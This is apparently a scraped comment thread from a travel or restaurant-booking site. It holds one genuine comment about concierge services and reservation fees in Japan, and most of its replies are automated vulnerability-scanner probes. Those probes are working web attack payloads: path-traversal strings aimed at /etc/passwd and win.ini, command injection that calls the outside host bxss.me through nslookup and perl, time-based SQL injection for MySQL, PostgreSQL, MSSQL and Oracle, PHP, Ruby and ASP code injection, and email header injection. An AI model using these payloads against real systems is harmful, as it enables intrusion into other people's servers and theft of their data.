re: kk1337

%2fetc%2fpasswd

1727141132

re: kk1337

&echo pvrndt$()\ kfvtmw\nz^xyu||a #' &echo pvrndt$()\ kfvtmw\nz^xyu||a #|" &echo pvrndt$()\ kfvtmw\nz^xyu||a #

1727141133

re: kk1337

/.././.././.././.././.././.././.././../etc/./passwd%00

1727141133

1727141133

re: kk1337

|echo xgvylj$()\ orjerk\nz^xyu||a #' |echo xgvylj$()\ orjerk\nz^xyu||a #|" |echo xgvylj$()\ orjerk\nz^xyu||a #

1727141134

re: kk1337

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1727141134

re: kk1337

bxss.me/t/xss.html?%00

1727141134

re: kk1337

"+"A".concat(70-3).concat(22*4).concat(103).concat(80).concat(106).concat(88)+(require"socket"
Socket.gethostbyname("hitnr"+"pwnaddor328b7.bxss.me.")[3].to_s)+"

1727141134

re: kk1337

(nslookup hiteifntwulpqc727d.bxss.me||perl -e "gethostbyname('hiteifntwulpqc727d.bxss.me')")

1727141135

re: kk1337

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1727141135

re: kk1337

'+'A'.concat(70-3).concat(22*4).concat(121).concat(86).concat(102).concat(75)+(require'socket'
Socket.gethostbyname('hitrk'+'taqmlnswff046.bxss.me.')[3].to_s)+'

1727141135

re: kk1337

1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg

1727141135

re: kk1337

$(nslookup hitwxzuyvcgubbce0c.bxss.me||perl -e "gethostbyname('hitwxzuyvcgubbce0c.bxss.me')")

1727141135

re: kk1337

../././../././../././../././../././../././../././../././../././../././etc/passwd

1727141136

re: kk1337

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1727141136

1727141136

re: kk1337

&nslookup hitemaxdluiyi22fd1.bxss.me&'\"`0&nslookup hitemaxdluiyi22fd1.bxss.me&`'

1727141136

re: kk1337

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

1727141136

re: kk1337

..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd

1727141137

1727141137

re: kk1337

&(nslookup hitjnjdabjsvy61d58.bxss.me||perl -e "gethostbyname('hitjnjdabjsvy61d58.bxss.me')")&'\"`0&(nslookup hitjnjdabjsvy61d58.bxss.me||perl -e "gethostbyname('hitjnjdabjsvy61d58.bxss.me')")&`'

1727141137

re: kk1337

';print(md5(31337));$a='

1727141137

re: kk1337

invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

1727141137

re: kk1337

/etc/shells

1727141138

re: kk1337

|(nslookup hitvfswumhivef3f1a.bxss.me||perl -e "gethostbyname('hitvfswumhivef3f1a.bxss.me')")

1727141138

re: kk1337

";print(md5(31337));$a="

1727141138

re: kk1337

'"

1727141138

re: kk1337

file:///etc/passwd

1727141138

re: kk1337

c:/windows/win.ini

1727141138

re: kk1337

`(nslookup hithzvqdumdjib8ca0.bxss.me||perl -e "gethostbyname('hithzvqdumdjib8ca0.bxss.me')")`

1727141139

re: kk1337

${@print(md5(31337))}

1727141139

re: kk1337

<!--

1727141139

re: kk1337

/\../\../\../\../\../\../\../etc/passwd

1727141139

re: kk1337

bxss.me

1727141139

re: kk1337

;(nslookup hitmovklfhkdaef1c8.bxss.me||perl -e "gethostbyname('hitmovklfhkdaef1c8.bxss.me')")|(nslookup hitmovklfhkdaef1c8.bxss.me||perl -e "gethostbyname('hitmovklfhkdaef1c8.bxss.me')")&(nslookup hitmovklfhkdaef1c8.bxss.me||perl -e "gethostbyname('hitmovklfhkdaef1c8.bxss.me')")

1727141139

re: kk1337

${@print(md5(31337))}\

1727141139

re: kk1337

/WEB-INF/web.xml

1727141140

re: kk1337

'.print(md5(31337)).'

1727141140

re: kk1337

C:\WINDOWS\system32\drivers\etc\hosts

1727141141

re: kk1337

../../../../../../../../../../windows/win.ini%00.jpg

1727141141

re: kk1337

/../../../../../../../../../../boot.ini

1727141142

re: kk1337

%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini

1727141143

re: kk1337

..\..\..\..\..\..\..\..\windows\win.ini

1727141143

re: kk1337

..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini

1727141144

re: kk1337

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1727141145

re: kk1337

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1727141145

re: kk1337

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1727141147

re: kk1337

unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\

1727141148

re: kk1337

WEB-INF/web.xml

1727141148

re: kk1337

WEB-INF\web.xml

1727141149

re: kk1337

1

1727141584

re: kk1337

1

1727141596

re: kk1337

-1 OR 2+616-616-1=0+0+0+1 --

1727141597

re: kk1337

-1 OR 3+616-616-1=0+0+0+1 --

1727141597

re: kk1337

-1 OR 2+314-314-1=0+0+0+1

1727141598

re: kk1337

-1 OR 3+314-314-1=0+0+0+1

1727141598

re: kk1337

-1' OR 2+690-690-1=0+0+0+1 --

1727141599

re: kk1337

-1' OR 3+690-690-1=0+0+0+1 --

1727141599

re: kk1337

-1' OR 2+734-734-1=0+0+0+1 or 'zMG3VXdL'='

1727141600

re: kk1337

-1' OR 3+734-734-1=0+0+0+1 or 'zMG3VXdL'='

1727141600

re: kk1337

-1" OR 2+497-497-1=0+0+0+1 --

1727141601

re: kk1337

-1" OR 3+497-497-1=0+0+0+1 --

1727141601

re: kk1337

if(now()=sysdate(),sleep(15),0)

1727141612

re: kk1337

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

1727141649

re: kk1337

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

1727141682

re: kk1337

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

1727141692

re: kk1337

-1; waitfor delay '0:0:15' --

1727141706

re: kk1337

-1); waitfor delay '0:0:15' --

1727141718

re: kk1337

1 waitfor delay '0:0:15' --

1727141730

re: kk1337

h6amh7JU'; waitfor delay '0:0:15' --

1727141742

re: kk1337

-5 OR 533=(SELECT 533 FROM PG_SLEEP(15))--

1727141753

re: kk1337

-5) OR 593=(SELECT 593 FROM PG_SLEEP(15))--

1727141763

re: kk1337

-1)) OR 499=(SELECT 499 FROM PG_SLEEP(15))--

1727141773

re: kk1337

8hBytlFE' OR 686=(SELECT 686 FROM PG_SLEEP(15))--

1727141782

re: kk1337

3G9xJLK8') OR 212=(SELECT 212 FROM PG_SLEEP(15))--

1727141790

re: kk1337

2hfC0I4m')) OR 408=(SELECT 408 FROM PG_SLEEP(15))--

1727141798

re: kk1337

1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

1727141806

re: kk1337

1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

1727141816

re: kk1337

'||(select 1 from (select pg_sleep(15))x)||'

1727141832

re: kk1337

''||(select 1 from (select pg_sleep(15))x)||''

1727141841

re: kk1337

1'"

1727141841

re: kk1337

@@w5Szg

1727141842

re: kk1337

1

1727383072

re: kk1337

1

1727383072

re: kk1337

1

1727383072

re: kk1337

1

1727383601

re: kk1337

1

1727383601

re: kk1337

1

1727383601

I think it should be like all other online concierges. They might have partnership with certain restaurants, whereas others they only will call but there is likely no hope of getting a reservation.

I remember seeing certain restaurants charging full amount when you make a reservation whereas others are charging 1000JPY.

1681296540 Reply
Add photos

re: guest

kTI7UB41

1697002631

re: guest

1*

1697002631

re: guest

1*

1697002631

re: guest

1*

1697002631

re: guest

1*

1697002632

re: guest

-1 OR 2+135-135-1=0+0+0+1

1697002632

re: guest

-1 OR 3+135-135-1=0+0+0+1

1697002632

re: guest

if(now()=sysdate(),sleep(15),0)

1697002637

re: guest

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

1697002642

re: guest

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

1697002646

re: guest

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

1697002650

re: guest

-1; waitfor delay '0:0:15' --

1697002655

re: guest

-1); waitfor delay '0:0:15' --

1697002662

re: guest

1 waitfor delay '0:0:15' --

1697002666

re: guest

tbTKlxcm'; waitfor delay '0:0:15' --

1697002670

re: guest

-5 OR 913=(SELECT 913 FROM PG_SLEEP(15))--

1697002674

re: guest

-5) OR 279=(SELECT 279 FROM PG_SLEEP(15))--

1697002679

re: guest

-1)) OR 214=(SELECT 214 FROM PG_SLEEP(15))--

1697002682

re: guest

WBzpG8BY' OR 873=(SELECT 873 FROM PG_SLEEP(15))--

1697002686

re: guest

n9cYWFcK') OR 93=(SELECT 93 FROM PG_SLEEP(15))--

1697002690

re: guest

ZtbLlKmu')) OR 45=(SELECT 45 FROM PG_SLEEP(15))--

1697002694

re: guest


*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

1697002698

re: guest


'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

1697002702

re: guest

'||(select 1 from (select pg_sleep(15))x)||'

1697002706

re: guest

''||(select 1 from (select pg_sleep(15))x)||''

1697002710

re: guest

1'"

1697002710

re: guest

@@lIkv6

1697002711

re: guest

pAU0xMTy

1697002729

re: guest

1*

1697002729

re: guest

1*

1697002730

re: guest

1*

1697002730

re: guest

1*

1697002730

re: guest

-1 OR 2+166-166-1=0+0+0+1

1697002730

re: guest

-1 OR 3+166-166-1=0+0+0+1

1697002730

re: guest

if(now()=sysdate(),sleep(15),0)

1697002734

re: guest

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

1697002740

re: guest

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

1697002744

re: guest

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

1697002748

re: guest

-1; waitfor delay '0:0:15' --

1697002752

re: guest

-1); waitfor delay '0:0:15' --

1697002757

re: guest

1 waitfor delay '0:0:15' --

1697002760

re: guest

Hcs9A7uB'; waitfor delay '0:0:15' --

1697002765

re: guest

-5 OR 512=(SELECT 512 FROM PG_SLEEP(15))--

1697002768

re: guest

-5) OR 496=(SELECT 496 FROM PG_SLEEP(15))--

1697002772

re: guest

-1)) OR 454=(SELECT 454 FROM PG_SLEEP(15))--

1697002776

re: guest

7Z87XrOl' OR 565=(SELECT 565 FROM PG_SLEEP(15))--

1697002780

re: guest

Ax96Dhwj') OR 335=(SELECT 335 FROM PG_SLEEP(15))--

1697002784

re: guest

NZ2d8l4v')) OR 413=(SELECT 413 FROM PG_SLEEP(15))--

1697002788

re: guest


*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

1697002792

re: guest


'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

1697002796

re: guest

'||(select 1 from (select pg_sleep(15))x)||'

1697002800

re: guest

''||(select 1 from (select pg_sleep(15))x)||''

1697002804

re: guest

1'"

1697002804

re: guest

@@EK8GE

1697002805

re: guest

1sTZv0m2O

1727140219

re: guest

%0abcc:074625.67-12678.67.126f6.19990.2@bxss.me

1727140223

re: guest

to@example.com>%0d%0abcc:074625.67-12679.67.126f6.19990.2@bxss.me

1727140223

re: guest

response.write(9727041*9052049)

1727140224

re: guest

'+response.write(9727041*9052049)+'

1727140224

re: guest

"+response.write(9727041*9052049)+"

1727140225

re: guest

../../../../../../../../../../../../../../etc/passwd

1727140226

re: guest

<esi:include src="http://bxss.me/rpb.png"/>

1727140226

re: guest

../../../../../../../../../../../../../../windows/win.ini

1727140227

re: guest

file:///etc/passwd

1727140227

re: guest

../../../../../../../../../../../../../../../proc/version

1727140228

re: guest

${9999446+9999140}

1727140228

re: guest

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

1727140229

re: guest

../../../../../../../../../../etc/passwd%00.jpg

1727140230

re: guest

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1727140231

re: guest

/../..//../..//../..//../..//../..//etc/passwd%00.jpg

1727140232

re: guest

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1727140232

re: guest

)

1727140233

re: guest

/etc/passwd

1727140233

re: guest

echo lncxpi$()\ sebbzu\nz^xyu||a #' &echo lncxpi$()\ sebbzu\nz^xyu||a #|" &echo lncxpi$()\ sebbzu\nz^xyu||a #

1727140233

re: guest

'.gethostbyname(lc('hitly'.'kkekqosgecb4a.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(108).chr(87).chr(108).chr(66).'

1727140234

re: guest

!(()&&!|*|*|

1727140234

re: guest

%2fetc%2fpasswd

1727140234

re: guest

&echo qkaemm$()\ apuxim\nz^xyu||a #' &echo qkaemm$()\ apuxim\nz^xyu||a #|" &echo qkaemm$()\ apuxim\nz^xyu||a #

1727140234

re: guest

/.././.././.././.././.././.././.././../etc/./passwd%00

1727140235

re: guest

".gethostbyname(lc("hituo"."wgrfpttu56a7d.bxss.me."))."A".chr(67).chr(hex("58")).chr(117).chr(67).chr(103).chr(75)."

1727140235

re: guest

^(#$!@#$)(()))******

1727140235

re: guest

|echo szsbsy$()\ flxvop\nz^xyu||a #' |echo szsbsy$()\ flxvop\nz^xyu||a #|" |echo szsbsy$()\ flxvop\nz^xyu||a #

1727140235

re: guest

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1727140236

re: guest

(nslookup hitylwjnspdpq674a1.bxss.me||perl -e "gethostbyname('hitylwjnspdpq674a1.bxss.me')")

1727140236

re: guest

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1727140237

re: guest

$(nslookup hitypkaaibhigd919b.bxss.me||perl -e "gethostbyname('hitypkaaibhigd919b.bxss.me')")

1727140237

re: guest

../././../././../././../././../././../././../././../././../././../././etc/passwd

1727140238

re: guest

&nslookup hitztnaeeqcbr3024e.bxss.me&'\"`0&nslookup hitztnaeeqcbr3024e.bxss.me&`'

1727140238

re: guest

..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd

1727140239

re: guest

&(nslookup hittnelgwurvg6abb3.bxss.me||perl -e "gethostbyname('hittnelgwurvg6abb3.bxss.me')")&'\"`0&(nslookup hittnelgwurvg6abb3.bxss.me||perl -e "gethostbyname('hittnelgwurvg6abb3.bxss.me')")&`'

1727140239

re: guest

invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

1727140240

re: guest

|(nslookup hitgqpjeapvlg8658d.bxss.me||perl -e "gethostbyname('hitgqpjeapvlg8658d.bxss.me')")

1727140240

1727140240

re: guest

"+"A".concat(70-3).concat(22*4).concat(104).concat(69).concat(120).concat(70)+(require"socket"
Socket.gethostbyname("hitwz"+"sqfnaxgt2e32f.bxss.me.")[3].to_s)+"

1727140240

re: guest

file:///etc/passwd

1727140241

re: guest

`(nslookup hithxtziycvczc915f.bxss.me||perl -e "gethostbyname('hithxtziycvczc915f.bxss.me')")`

1727140241

re: guest

1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg

1727140241

re: guest

bxss.me/t/xss.html?%00

1727140241

re: guest

'+'A'.concat(70-3).concat(22*4).concat(120).concat(69).concat(118).concat(85)+(require'socket'
Socket.gethostbyname('hitwe'+'wmvikkrw48c45.bxss.me.')[3].to_s)+'

1727140241

re: guest

/\../\../\../\../\../\../\../etc/passwd

1727140242

re: guest

;(nslookup hitiwxvwrlyii3ad43.bxss.me||perl -e "gethostbyname('hitiwxvwrlyii3ad43.bxss.me')")|(nslookup hitiwxvwrlyii3ad43.bxss.me||perl -e "gethostbyname('hitiwxvwrlyii3ad43.bxss.me')")&(nslookup hitiwxvwrlyii3ad43.bxss.me||perl -e "gethostbyname('hitiwxvwrlyii3ad43.bxss.me')")

1727140242

re: guest

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1727140242

1727140242

re: guest

/WEB-INF/web.xml

1727140242

1727140243

re: guest

C:\WINDOWS\system32\drivers\etc\hosts

1727140244

re: guest

/etc/shells

1727140244

re: guest

../../../../../../../../../../windows/win.ini%00.jpg

1727140245

re: guest

c:/windows/win.ini

1727140245

re: guest

/../../../../../../../../../../boot.ini

1727140246

re: guest

bxss.me

1727140246

re: guest

'"

1727140247

re: guest

%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini

1727140247

re: guest

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

1727140247

re: guest

<!--

1727140248

re: guest

..\..\..\..\..\..\..\..\windows\win.ini

1727140248

re: guest

';print(md5(31337));$a='

1727140248

re: guest

";print(md5(31337));$a="

1727140249

re: guest

..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini

1727140249

re: guest

${@print(md5(31337))}

1727140250

re: guest

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1727140251

re: guest

${@print(md5(31337))}\

1727140251

re: guest

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1727140252

re: guest

